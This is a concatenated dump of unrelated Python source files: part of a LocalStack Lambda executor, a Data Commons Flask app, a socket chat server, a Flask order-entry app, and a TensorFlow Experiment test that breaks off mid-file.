os.chdir(lambda_cwd)
sys.path.insert(0, "")
if environment:
os.environ.update(environment)
# set default env variables required for most Lambda handlers
self.set_default_env_variables()
# run the actual handler function
result = lambda_function_callable(inv_context.event, context)
except Exception as e:
result = str(e)
sys.stderr.write("%s %s" % (e, traceback.format_exc()))
raise
finally:
queue.put(result)
process = Process(target=do_execute)
start_time = now(millis=True)
error = None
with CaptureOutput() as c:
try:
process.run()
except Exception as e:
error = e
result = queue.get()
end_time = now(millis=True)
# Make sure to keep the log line below, to ensure the log stream gets created
request_id = long_uid()
log_output = 'START %s: Lambda %s started via "local" executor ...' % (
request_id,
lambda_function.arn(),
)
# TODO: Interweaving stdout/stderr currently not supported
for stream in (c.stdout(), c.stderr()):
if stream:
log_output += ("\n" if log_output else "") + stream
if isinstance(result, InvocationResult) and result.log_output:
log_output += "\n" + result.log_output
log_output += "\nEND RequestId: %s" % request_id
log_output += "\nREPORT RequestId: %s Duration: %s ms" % (
request_id,
int((end_time - start_time) * 1000),
)
# store logs to CloudWatch
store_lambda_logs(lambda_function, log_output)
result = result.result if isinstance(result, InvocationResult) else result
if error:
LOG.info(
'Error executing Lambda "%s": %s %s',
lambda_function.arn(),
error,
"".join(traceback.format_tb(error.__traceback__)),
)
raise InvocationException(result, log_output)
# construct final invocation result
invocation_result = InvocationResult(result, log_output=log_output)
# run plugins post-processing logic
invocation_result = self.process_result_via_plugins(inv_context, invocation_result)
return invocation_result
def provide_file_to_lambda(self, local_file: str, inv_context: InvocationContext) -> str:
# This is a no-op for local executors - simply return the given local file path
return local_file
def execute_java_lambda(
self, event, context, main_file, lambda_function: LambdaFunction = None
) -> InvocationResult:
lambda_function.envvars = lambda_function.envvars or {}
java_opts = config.LAMBDA_JAVA_OPTS or ""
handler = lambda_function.handler
lambda_function.envvars[LAMBDA_HANDLER_ENV_VAR_NAME] = handler
event_file = EVENT_FILE_PATTERN.replace("*", short_uid())
save_file(event_file, json.dumps(json_safe(event)))
TMP_FILES.append(event_file)
classpath = "%s:%s:%s" % (
main_file,
Util.get_java_classpath(main_file),
LAMBDA_EXECUTOR_JAR,
)
cmd = "java %s -cp %s %s %s" % (
java_opts,
classpath,
LAMBDA_EXECUTOR_CLASS,
event_file,
)
# apply plugin patches
inv_context = InvocationContext(
lambda_function, event, environment=lambda_function.envvars, lambda_command=cmd
)
result = self.apply_plugin_patches(inv_context)
if isinstance(result, InvocationResult):
return result
cmd = inv_context.lambda_command
LOG.info(cmd)
# execute Lambda and get invocation result
invocation_result = self._execute_in_custom_runtime(cmd, lambda_function=lambda_function)
return invocation_result
def execute_javascript_lambda(
self, event, context, main_file, lambda_function: LambdaFunction = None
):
handler = lambda_function.handler
function = handler.split(".")[-1]
event_json_string = "%s" % (json.dumps(json_safe(event)) if event else "{}")
context_json_string = "%s" % (json.dumps(context.__dict__) if context else "{}")
cmd = [
"node",
"-e",
'require("%s").%s(%s,%s).then(r => process.stdout.write(JSON.stringify(r)))'
% (
main_file,
function,
event_json_string,
context_json_string,
),
]
LOG.info(cmd)
result = self._execute_in_custom_runtime(cmd, lambda_function=lambda_function)
return result
def execute_go_lambda(self, event, context, main_file, lambda_function: LambdaFunction = None):
if lambda_function:
lambda_function.envvars["AWS_LAMBDA_FUNCTION_HANDLER"] = main_file
lambda_function.envvars["AWS_LAMBDA_EVENT_BODY"] = json.dumps(json_safe(event))
else:
LOG.warning("Unable to get function details for local execution of Golang Lambda")
cmd = GO_LAMBDA_RUNTIME
LOG.debug("Running Golang Lambda with runtime: %s", cmd)
result = self._execute_in_custom_runtime(cmd, lambda_function=lambda_function)
return result
@staticmethod
def set_default_env_variables():
# set default env variables required for most Lambda handlers
default_env_vars = {"AWS_DEFAULT_REGION": aws_stack.get_region()}
env_vars_before = {var: os.environ.get(var) for var in default_env_vars}
os.environ.update({k: v for k, v in default_env_vars.items() if not env_vars_before.get(k)})
return env_vars_before
@staticmethod
def reset_default_env_variables(env_vars_before):
for env_name, env_value in env_vars_before.items():
env_value_before = env_vars_before.get(env_name)
os.environ[env_name] = env_value_before or ""
if env_value_before is None:
os.environ.pop(env_name, None)
@classmethod
def get_lambda_callable(cls, function: LambdaFunction, qualifier: str = None) -> Callable:
"""Returns the function Callable for invoking the given function locally"""
qualifier = function.get_qualifier_version(qualifier)
func_dict = cls.FUNCTION_CALLABLES.get(function.arn()) or {}
# TODO: function versioning and qualifiers should be refactored and designed properly!
callable = func_dict.get(qualifier) or func_dict.get(LambdaFunction.QUALIFIER_LATEST)
if not callable:
raise Exception(
f"Unable to find callable for Lambda function {function.arn()} - {qualifier}"
)
return callable
@classmethod
def add_function_callable(cls, function: LambdaFunction, lambda_handler: Callable):
"""Sets the function Callable for invoking the $LATEST version of the Lambda function."""
func_dict = cls.FUNCTION_CALLABLES.setdefault(function.arn(), {})
qualifier = function.get_qualifier_version(LambdaFunction.QUALIFIER_LATEST)
func_dict[qualifier] = lambda_handler
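    # Illustrative usage (hypothetical LambdaFunction "fn" and callable "handler"):
    #   LambdaExecutorLocal.add_function_callable(fn, handler)  # registers the $LATEST version
    #   LambdaExecutorLocal.get_lambda_callable(fn)             # resolves back to "handler"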
class Util:
debug_java_port = False
@classmethod
def get_java_opts(cls):
opts = config.LAMBDA_JAVA_OPTS or ""
# Replace _debug_port_ with a random free port
if "_debug_port_" in opts:
if not cls.debug_java_port:
cls.debug_java_port = get_free_tcp_port()
opts = opts.replace("_debug_port_", ("%s" % cls.debug_java_port))
else:
# Parse the debug port from opts
m = re.match(".*address=(.+:)?(\\d+).*", opts)
if m is not None:
cls.debug_java_port = m.groups()[1]
return opts
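    # Illustrative example (hypothetical LAMBDA_JAVA_OPTS value):
    #   "-agentlib:jdwp=transport=dt_socket,server=y,suspend=y,address=_debug_port_"
    #   -> "_debug_port_" is replaced with a randomly chosen free TCP port, which is also
    #      stored in cls.debug_java_port and used for the Java debug port mapping above.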
@classmethod
def get_host_path_for_path_in_docker(cls, path):
return re.sub(r"^%s/(.*)$" % config.dirs.tmp, r"%s/\1" % config.dirs.functions, path)
@classmethod
def format_windows_path(cls, path):
temp = path.replace(":", "").replace("\\", "/")
if len(temp) >= 1 and temp[:1] != "/":
temp = "/" + temp
temp = "%s%s" % (config.WINDOWS_DOCKER_MOUNT_PREFIX, temp)
return temp
@classmethod
def docker_image_for_lambda(cls, lambda_function: LambdaFunction):
runtime = lambda_function.runtime or ""
if lambda_function.code.get("ImageUri"):
LOG.warning(
"ImageUri is set: Using Lambda container images is only supported in LocalStack Pro"
)
docker_tag = runtime
docker_image = config.LAMBDA_CONTAINER_REGISTRY
if runtime == "nodejs14.x" and docker_image == DEFAULT_LAMBDA_CONTAINER_REGISTRY:
# TODO temporary fix until lambci image for nodejs14.x becomes available
docker_image = "localstack/lambda-js"
if runtime == "python3.9" and docker_image == DEFAULT_LAMBDA_CONTAINER_REGISTRY:
# TODO temporary fix until we support AWS images via https://github.com/localstack/localstack/pull/4734
docker_image = "mlupin/docker-lambda"
return "%s:%s" % (docker_image, docker_tag)
@classmethod
def get_java_classpath(cls, archive):
"""
Return the Java classpath, using the parent folder of the
given archive as the base folder.
The result contains any *.jar files in the base folder, as
well as any JAR files in the "lib/*" subfolder living
alongside the supplied java archive (.jar or .zip).
:param archive: an absolute path to a .jar or .zip Java archive
:return: the Java classpath, relative to the base dir of "archive"
"""
entries = ["."]
base_dir = os.path.dirname(archive)
for pattern in ["%s/*.jar", "%s/lib/*.jar", "%s/java/lib/*.jar", "%s/*.zip"]:
for entry in glob.glob(pattern % base_dir):
if os.path.realpath(archive) != os.path.realpath(entry):
entries.append(os.path.relpath(entry, base_dir))
# make sure to append the localstack-utils.jar at the end of the classpath
# https://github.com/localstack/localstack/issues/1160
entries.append(os.path.relpath(archive, base_dir))
entries.append("*.jar")
entries.append("java/lib/*.jar")
result = ":".join(entries)
return result
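    # Illustrative result (hypothetical layout with "handler.jar" plus "lib/dep.jar" next to it):
    #   ".:lib/dep.jar:handler.jar:*.jar:java/lib/*.jar"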
@staticmethod
def mountable_tmp_file():
f = os.path.join(config.dirs.tmp, short_uid())
TMP_FILES.append(f)
return f
@staticmethod
def inject_endpoints_into_env(env_vars: Dict[str, str]):
env_vars = env_vars or {}
main_endpoint = get_main_endpoint_from_container()
if not env_vars.get("LOCALSTACK_HOSTNAME"):
env_vars["LOCALSTACK_HOSTNAME"] = main_endpoint
return env_vars
def log_lambda_result(func_arn, result, log_output):
result = to_str(result or "")
log_output = truncate(to_str(log_output or ""), max_length=1000)
log_formatted = truncate(log_output.strip().replace("\n", "\n> "), max_length=1000)
LOG.debug("Lambda %s result / log output:\n%s\n> %s", func_arn, result.strip(), log_formatted)
# --------------
# GLOBAL STATE
# --------------
EXECUTOR_LOCAL = LambdaExecutorLocal()
EXECUTOR_CONTAINERS_SEPARATE = LambdaExecutorSeparateContainers()
EXECUTOR_CONTAINERS_REUSE = LambdaExecutorReuseContainers()
DEFAULT_EXECUTOR = EXECUTOR_CONTAINERS_SEPARATE
# the keys of AVAILABLE_EXECUTORS map to the LAMBDA_EXECUTOR config variable
AVAILABLE_EXECUTORS = {
"local": EXECUTOR_LOCAL,
"docker": EXECUTOR_CONTAINERS_SEPARATE,
"docker-reuse": EXECUTOR_CONTAINERS_REUSE,
}
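# Illustrative lookup (a sketch only, assuming the LAMBDA_EXECUTOR config value is one of the keys above):
#   lambda_executor = AVAILABLE_EXECUTORS.get(config.LAMBDA_EXECUTOR, DEFAULT_EXECUTOR)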
|
main.py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Main entry module specified in app.yaml.
This module contains the request handler codes and the main app.
"""
import json
import logging
import os
import requests
import sys
import threading
import time
import flask
from flask import request
import services.datacommons as dc
from lib import translator
from __init__ import create_app
from cache import cache
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s %(lineno)d : %(message)s')
app = create_app()
app.jinja_env.globals['GA_ACCOUNT'] = app.config['GA_ACCOUNT']
app.jinja_env.globals['PRIVATE'] = app.config['PRIVATE']
app.jinja_env.globals['SUSTAINABILITY'] = app.config['SUSTAINABILITY']
app.jinja_env.globals['NAME'] = app.config['NAME']
app.jinja_env.globals['BASE_HTML'] = 'sustainability/base.html' if app.config[
'SUSTAINABILITY'] else 'base.html'
GCS_BUCKET = app.config['GCS_BUCKET']
_MAX_SEARCH_RESULTS = 1000
WARM_UP_ENDPOINTS = [
"/api/choropleth/geojson?placeDcid=country/USA&placeType=County",
"/api/place/parent/country/USA",
"/api/place/places-in-names?dcid=country/USA&placeType=County",
"/api/stats/set/series/within-place?parent_place=country/USA&child_type=County&stat_vars=Count_Person",
]
def send_warmup_requests():
logging.info("Sending warm up requests:")
for endpoint in WARM_UP_ENDPOINTS:
while True:
try:
resp = requests.get("http://127.0.0.1:8080" + endpoint)
if resp.status_code == 200:
break
            except requests.exceptions.RequestException:
                # server not ready yet; retry after the sleep below
                pass
time.sleep(1)
@app.before_request
def before_request():
scheme = request.headers.get('X-Forwarded-Proto')
if scheme and scheme == 'http' and request.url.startswith('http://'):
url = request.url.replace('http://', 'https://', 1)
code = 301
return flask.redirect(url, code=code)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@cache.cached(timeout=3600 * 24)
@app.route('/api/placeid2dcid/<path:placeid>')
def api_placeid2dcid(placeid):
"""
API endpoint to get dcid based on place id.
    This is to be used together with the Google Maps Autocomplete API:
https://developers.google.com/places/web-service/autocomplete.
"""
if placeid in app.config['PLACEID2DCID']:
return app.config['PLACEID2DCID'][placeid]
else:
flask.abort(404, 'dcid not found for %s' % placeid)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/translator')
def translator_handler():
return flask.render_template('translator.html',
schema_mapping=translator.SCHEMA_MAPPING,
sample_query=translator.SAMPLE_QUERY)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/search')
def search():
return flask.render_template('search.html')
@app.route('/healthz')
def healthz():
return "very healthy"
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/search_dc')
def search_dc():
"""Add DC API powered search for non-place searches temporarily"""
query_text = request.args.get('q', '')
max_results = int(request.args.get('l', _MAX_SEARCH_RESULTS))
search_response = dc.search(query_text, max_results)
# Convert from search results to template dictionary.
results = []
query_tokens = set(query_text.lower().split())
for section in search_response.get('section', []):
entities = []
for search_entity in section['entity']:
entity = {}
entity['name'] = search_entity['name']
entity['dcid'] = search_entity['dcid']
name_tokens = search_entity['name'].lower().split()
for i, t in enumerate(name_tokens):
name_tokens[i] = t.strip("'")
name_tokens = set(name_tokens)
if not name_tokens & query_tokens:
continue
entity['rank'] = len(name_tokens & query_tokens) / len(name_tokens |
query_tokens)
entities.append(entity)
entities = sorted(entities, key=lambda e: (e['rank']), reverse=True)
if entities:
results.append({
'type': section['typeName'],
'entities': entities,
})
return flask.render_template('search_dc.html',
query_text=query_text,
results=results)
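# Note: entity['rank'] above is the Jaccard similarity between the query tokens and the
# entity name tokens, e.g. query "california population" vs. name "California" yields 1/2.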
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/weather')
def get_weather():
dcid = request.args.get('dcid')
prop = request.args.get('prop')
period = request.args.get('period')
if not dcid:
flask.abort(400, 'Missing url parameter "dcid"')
if not prop:
flask.abort(400, 'Missing url parameter "prop"')
if not period:
flask.abort(400, 'Missing url parameter "period"')
query_string = ('SELECT ?date ?mean ?unit ?provId '
'WHERE {{'
' ?o typeOf {period}WeatherObservation .'
' ?o observedNode {dcid} .'
' ?o measuredProperty {prop} .'
' ?o observationDate ?date .'
' ?o unit ?unit .'
' ?o meanValue ?mean .'
' ?o provenance ?provId .}}').format(period=period,
dcid=dcid,
prop=prop)
_, rows = dc.query(query_string)
observations = []
for row in rows:
if ('value' not in row['cells'][0] or 'value' not in row['cells'][1] or
'value' not in row['cells'][2]):
continue
date = row['cells'][0]['value']
if date < '2000':
continue
text = 'mean {}: {} {}'.format(prop, row['cells'][1]['value'],
row['cells'][2]['value'])
observations.append({
'measuredProperty': prop,
'observationDate': date,
'meanValue': row['cells'][1]['value'],
'unit': row['cells'][2]['value'],
'text': text,
'provId': row['cells'][3]['value'],
})
return json.dumps(observations)
# TODO(beets): Move this to a separate handler so it won't be installed on all apps.
@app.route('/mcf_playground')
def mcf_playground():
return flask.render_template('mcf_playground.html')
# TODO(shifucun): get branch cache version from mixer
@app.route('/version')
def version():
return flask.render_template('version.html',
website_hash=os.environ.get("WEBSITE_HASH"),
mixer_hash=os.environ.get("MIXER_HASH"),
bigtable=os.environ.get("BIG_TABLE"),
bigquery=os.environ.get("BIG_QUERY"))
if not (app.config["TEST"] or app.config["WEBDRIVER"] or app.config["LOCAL"]):
thread = threading.Thread(target=send_warmup_requests)
thread.start()
if __name__ == '__main__':
# This is used when running locally only. When deploying to GKE,
# a webserver process such as Gunicorn will serve the app.
logging.info("Run web server in local mode")
    port = int(sys.argv[1]) if len(sys.argv) >= 2 else 8080
app.run(host='127.0.0.1', port=port, debug=True)
|
chat_Server.py
|
import socket
from threading import Thread
import sys
sock = socket.socket()
sock.bind(("localhost", 24003))
sock.listen(10)
arr = []
def receive():
    while True:
        # iterate over a copy so disconnected clients can be removed safely
        for connection in arr[:]:
            try:
                data = connection.recv(1024)
                if data:
                    print(connection, ':', data.decode())
            except socket.error as e:
                if e.errno == 10053:  # WSAECONNABORTED: client closed the connection
                    arr.remove(connection)
                    print("Users amount - ", len(arr))
                else:
                    raise
def send():
while True:
global arr
message = input()
if message:
for connection in arr:
connection.send(message.encode())
def accept():
while True:
global arr
arr.append(sock.accept()[0])
print("Users amount - ", len(arr))
receiving = Thread(target=receive)
sending = Thread(target=send)
accepting = Thread(target=accept)
receiving.start()
sending.start()
accepting.start()
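# Minimal client sketch for manual testing (assumes this server is running locally):
#   import socket
#   s = socket.socket()
#   s.connect(("localhost", 24003))
#   s.send("hello".encode())       # shows up on the server console
#   print(s.recv(1024).decode())   # prints whatever the server operator types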
|
web_application.py
|
from flask import Flask, render_template, request, url_for, redirect
from flask_bootstrap import Bootstrap
from forms import Enter_Order, Replace_Order, Cancel_Order, Submit_Order
import threading
import time
import json
from src.client import Client
app = Flask(__name__)
app.secret_key = "adkljrhLKJFHELJKFh"
bootstrap = Bootstrap(app)
order_number_index = 1
normalisedList = []
@app.route("/", methods = ["GET", "POST"])
def home():
form = Submit_Order()
if form.validate_on_submit():
send()
return render_template("completed.html")
return render_template('dashboard.html', form=form)
def send():
outbound = {
'actions': normalisedList
}
with open('test_inputs/client_100.json', 'w') as fp:
json.dump(outbound, fp)
Client(path='test_inputs/client_100.json')
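# Illustrative shape of test_inputs/client_100.json written by send() (field values are examples only):
#   {"actions": [{"message_type": "...", "order_token": 1, "quantity": 100, "price": 1.5, ...}]}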
def normalise_enter(form_info):
global normalisedList
normalised = {
'message_type': str(form_info['message_type']),
'order_token': int(form_info['order_token']),
'client_reference': str(form_info['client_reference']),
'buy_sell_indicator': str(form_info['indicator']),
'quantity': int(form_info['quantity']),
'orderbook_id': int(form_info['orderbook_id']),
'group': str(form_info['group']),
'price': float(form_info['price']),
'time_in_force': int(form_info['time_in_force']),
'firm_id': int(form_info['firm_id']),
'display': str(form_info['display']),
'capacity': str(form_info['capacity']),
'minimum_quantity': int(form_info['minimum_quantity']),
'order_classification': str(form_info['order_classification']),
'cash_margin_type': str(form_info['cash_margin_type'])
}
normalisedList.append(normalised)
def normalised_replace(form_info):
global normalisedList
normalised = {
'message_type': str(form_info['message_type']),
'existing_order_token': int(form_info['existing_order_token']),
'replacement_order_token': int(form_info['replacement_order_token']),
'quantity': int(form_info['quantity']),
'price': float(form_info['price']),
'time_in_force': int(form_info['time_in_force']),
'display': str(form_info['display']),
'minimum_quantity': int(form_info['minimum_quantity']),
}
normalisedList.append(normalised)
def normalised_cancel(form_info):
global normalisedList
normalised = {
'message_type': str(form_info['message_type']),
'order_token': int(form_info['order_token']),
'quantity': int(form_info['quantity']),
}
normalisedList.append(normalised)
@app.route('/enter_order', methods = ['GET', 'POST'])
def enter_order_page():
global order_number_index
form = Enter_Order()
if form.validate_on_submit():
order_number_index += 1
form_info = request.form
normalise_enter(form_info)
return redirect(url_for('enter_order_page'))
return render_template('enter.html', form = form, num = order_number_index)
@app.route('/replace_order', methods = ['GET', 'POST'])
def replace_order_page():
global order_number_index
form = Replace_Order()
if form.validate_on_submit():
order_number_index += 1
form_info = request.form
normalised_replace(form_info)
return redirect(url_for('replace_order_page'))
return render_template('replace.html', form = form, num = order_number_index)
@app.route('/cancel_order', methods = ['GET', 'POST'])
def cancel_order_page():
global order_number_index
form = Cancel_Order()
if form.validate_on_submit():
order_number_index +=1
form_info = request.form
normalised_cancel(form_info)
return redirect(url_for('cancel_order_page'))
return render_template('cancel.html', form = form, num = order_number_index)
@app.route('/dashboard', methods= ['GET', 'POST'])
def dashboard():
print("hello")
return render_template('dashboard.html')
if __name__ == '__main__':
# a = threading.Thread(target = app.run, daemon=True)
# b = threading.Thread(target = testing, daemon=True)
# a.start()
# b.start()
app.run(debug=True)
print("Press enter to exit.")
|
experiment_test.py
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for TaskRunner and Experiment class."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import json
import os
import sys
import tempfile
import threading
# TODO: #6568 Remove this hack that makes dlopen() not crash.
if hasattr(sys, 'getdlopenflags') and hasattr(sys, 'setdlopenflags'):
import ctypes
sys.setdlopenflags(sys.getdlopenflags() | ctypes.RTLD_GLOBAL)
from tensorflow.contrib.learn.python.learn import evaluable
from tensorflow.contrib.learn.python.learn import experiment
from tensorflow.contrib.learn.python.learn import monitors
from tensorflow.contrib.learn.python.learn import run_config
from tensorflow.contrib.learn.python.learn import trainable
from tensorflow.contrib.learn.python.learn.estimators import run_config as run_config_lib
from tensorflow.contrib.learn.python.learn.utils import saved_model_export_utils
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging
from tensorflow.python.training import saver
from tensorflow.python.training import server_lib
from tensorflow.python.training import session_run_hook
from tensorflow.python.util import compat
from tensorflow.python.util.all_util import reveal_undocumented
class SheepCounter(object):
"""To be patched in for time.sleep, in order to capture how long was slept."""
def __init__(self):
self._total_time = 0
self._sleeptimes = []
def __call__(self, t):
self._total_time += t
self._sleeptimes += [t]
@property
def total_time(self):
return self._total_time
@property
def sleep_times(self):
return self._sleeptimes
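# Typical use (as in the tests below): patch time.sleep with a SheepCounter, run the code under
# test, then inspect sheep.total_time / sheep.sleep_times to verify how long it tried to sleep.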
class TestEstimator(evaluable.Evaluable, trainable.Trainable):
def __init__(self, config=None, max_evals=5):
self.eval_count = 0
self.fit_count = 0
self._max_evals = max_evals
self.export_count = 0
self.monitors = []
self.eval_hooks = []
self._config = config or run_config.RunConfig()
self._model_dir = tempfile.mkdtemp()
@property
def model_dir(self):
return self._model_dir
@property
def config(self):
return self._config
def evaluate(self, **kwargs):
tf_logging.info('evaluate called with args: %s' % kwargs)
if 'hooks' in kwargs:
self.eval_hooks = kwargs['hooks']
self.eval_count += 1
if self.eval_count > self._max_evals:
tf_logging.info('Ran %d evals. Done.' % self.eval_count)
raise StopIteration()
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
def fake_checkpoint(self):
save_path = os.path.join(self.model_dir, 'model.ckpt')
with session.Session() as sess:
var = variables.Variable(1.0, name='var0')
save = saver.Saver({var.op.name: var})
var.initializer.run()
save.save(sess, save_path, global_step=0)
def fit(self, **kwargs):
self.fake_checkpoint()
tf_logging.info('fit called with args: %s' % kwargs)
self.fit_count += 1
if 'monitors' in kwargs:
self.monitors = kwargs['monitors']
return [(key, kwargs[key]) for key in sorted(kwargs.keys())]
def export_savedmodel(self, export_dir_base, serving_input_fn, **kwargs):
tf_logging.info('export_savedmodel called with args: %s, %s, %s' %
(export_dir_base, serving_input_fn, kwargs))
self.export_count += 1
return os.path.join(
compat.as_bytes(export_dir_base), compat.as_bytes('bogus_timestamp'))
class _NoopHook(session_run_hook.SessionRunHook):
pass
class ExperimentTest(test.TestCase):
def _cluster_spec(self):
return {
run_config_lib.TaskType.PS: ['host1:2222', 'host2:2222'],
run_config_lib.TaskType.WORKER:
['host3:2222', 'host4:2222', 'host5:2222']
}
def test_train(self):
est = TestEstimator()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
train_steps='train_steps',
eval_input_fn='eval_input',
eval_metrics='eval_metrics')
fit_args = ex.train(delay_secs=0)
self.assertEquals(1, est.fit_count)
self.assertIn(('max_steps', 'train_steps'), fit_args)
self.assertEquals(0, est.eval_count)
def test_train_delay(self):
est = TestEstimator()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
for delay in [0, 1, 3]:
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train(delay_secs=delay)
self.assertAlmostEqual(delay, sheep.total_time, delta=0.1)
def test_train_default_delay(self):
for task_id in [0, 1, 3]:
tf_config = {'task': {'index': task_id}}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config.RunConfig()
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train()
self.assertAlmostEqual(task_id * 5, sheep.total_time, delta=0.1)
@test.mock.patch.object(server_lib, 'Server')
def test_train_starts_server(self, mock_server):
# Arrange.
tf_config = {
'cluster': self._cluster_spec(),
'environment': run_config_lib.Environment.CLOUD,
'task': {
'type': run_config_lib.TaskType.WORKER,
'index': 1
}
}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(
master='host4:2222', num_cores=15, gpu_memory_fraction=0.314)
est = TestEstimator(config)
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input')
# Act.
# We want to make sure we discount the time it takes to start the server
# in our accounting of the delay, so we set a small delay here.
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.train(delay_secs=1)
# Ensure that the delay takes into account the time to start the server.
self.assertAlmostEqual(1, sheep.total_time, delta=0.1)
# Assert.
expected_config_proto = config_pb2.ConfigProto()
expected_config_proto.inter_op_parallelism_threads = 15
expected_config_proto.intra_op_parallelism_threads = 15
expected_config_proto.gpu_options.per_process_gpu_memory_fraction = 0.314
mock_server.assert_called_with(
config.cluster_spec,
job_name=run_config_lib.TaskType.WORKER,
task_index=1,
config=expected_config_proto,
start=False)
mock_server.assert_has_calls([test.mock.call().start()])
@test.mock.patch.object(server_lib, 'Server')
def test_train_server_does_not_start_without_cluster_spec(self, mock_server):
config = run_config_lib.RunConfig(master='host4:2222')
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because there was no ClusterSpec.
self.assertFalse(mock_server.called)
@test.mock.patch.object(server_lib, 'Server')
def test_train_server_does_not_start_with_empty_master(self, mock_server):
tf_config = {'cluster': self._cluster_spec()}
with test.mock.patch.dict('os.environ',
{'TF_CONFIG': json.dumps(tf_config)}):
config = run_config_lib.RunConfig(master='')
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
# The server should not have started because master was the empty string.
self.assertFalse(mock_server.called)
def test_train_raises_if_job_name_is_missing(self):
tf_config = {
'cluster': self._cluster_spec(),
'environment': run_config_lib.Environment.CLOUD,
'task': {
'index': 1
}
}
with test.mock.patch.dict(
'os.environ',
{'TF_CONFIG': json.dumps(tf_config)}), self.assertRaises(ValueError):
config = run_config_lib.RunConfig(
master='host3:2222' # Normally selected by task type.
)
ex = experiment.Experiment(
TestEstimator(config),
train_input_fn='train_input',
eval_input_fn='eval_input')
ex.train()
def test_evaluate(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
eval_steps='steps',
eval_delay_secs=0)
ex.evaluate()
self.assertEquals(0, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals([noop_hook], est.eval_hooks)
def test_evaluate_delay(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est, train_input_fn='train_input', eval_input_fn='eval_input',
eval_hooks=[noop_hook])
for delay in [0, 1, 3]:
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
ex.evaluate(delay_secs=delay)
self.assertAlmostEqual(delay, sheep.total_time, delta=0.1)
self.assertEquals([noop_hook], est.eval_hooks)
def test_continuous_eval(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
eval_delay_secs=0,
continuous_eval_throttle_secs=0)
self.assertRaises(
StopIteration, ex.continuous_eval, evaluate_checkpoint_only_once=False)
self.assertEquals(0, est.fit_count)
self.assertEquals(6, est.eval_count)
self.assertEquals([noop_hook], est.eval_hooks)
def test_continuous_eval_throttle_delay(self):
for delay in [0, 1, 2]:
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
continuous_eval_throttle_secs=delay,
eval_delay_secs=0)
with test.mock.patch('time.sleep', SheepCounter()) as sheep:
self.assertRaises(
StopIteration,
ex.continuous_eval,
evaluate_checkpoint_only_once=False)
self.assertAlmostEqual(5 * delay, sheep.total_time, delta=0.1)
def test_continuous_eval_predicate_fn(self):
est = TestEstimator()
est.fake_checkpoint()
noop_hook = _NoopHook()
def _predicate_fn(unused_eval_result):
return est.eval_count < 3
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
eval_delay_secs=0,
continuous_eval_throttle_secs=0,
continuous_eval_predicate_fn=_predicate_fn)
ex.continuous_eval(evaluate_checkpoint_only_once=False)
self.assertEquals(0, est.fit_count)
self.assertEquals(3, est.eval_count)
self.assertEquals([noop_hook], est.eval_hooks)
def test_run_local(self):
est = TestEstimator()
noop_hook = _NoopHook()
ex = experiment.Experiment(
est,
train_input_fn='train_input',
eval_input_fn='eval_input',
eval_metrics='eval_metrics',
eval_hooks=[noop_hook],
train_steps=100,
eval_steps=100,
local_eval_frequency=10)
ex.local_run()
self.assertEquals(1, est.fit_count)
self.assertEquals(1, est.eval_count)
self.assertEquals(1, len(est.monitors))
self.assertEquals([noop_hook], est.eval_hooks)
self.assertTrue(isinstance(est.monitors[0], monitors.ValidationMonitor))
def test_train_monitors_returns_shallow_copy(self):
noop_hook = _NoopHook()
ex = experiment.Experiment(
TestEstimator(),
train_input_fn='train_input',
eval_input_fn='eval_input',
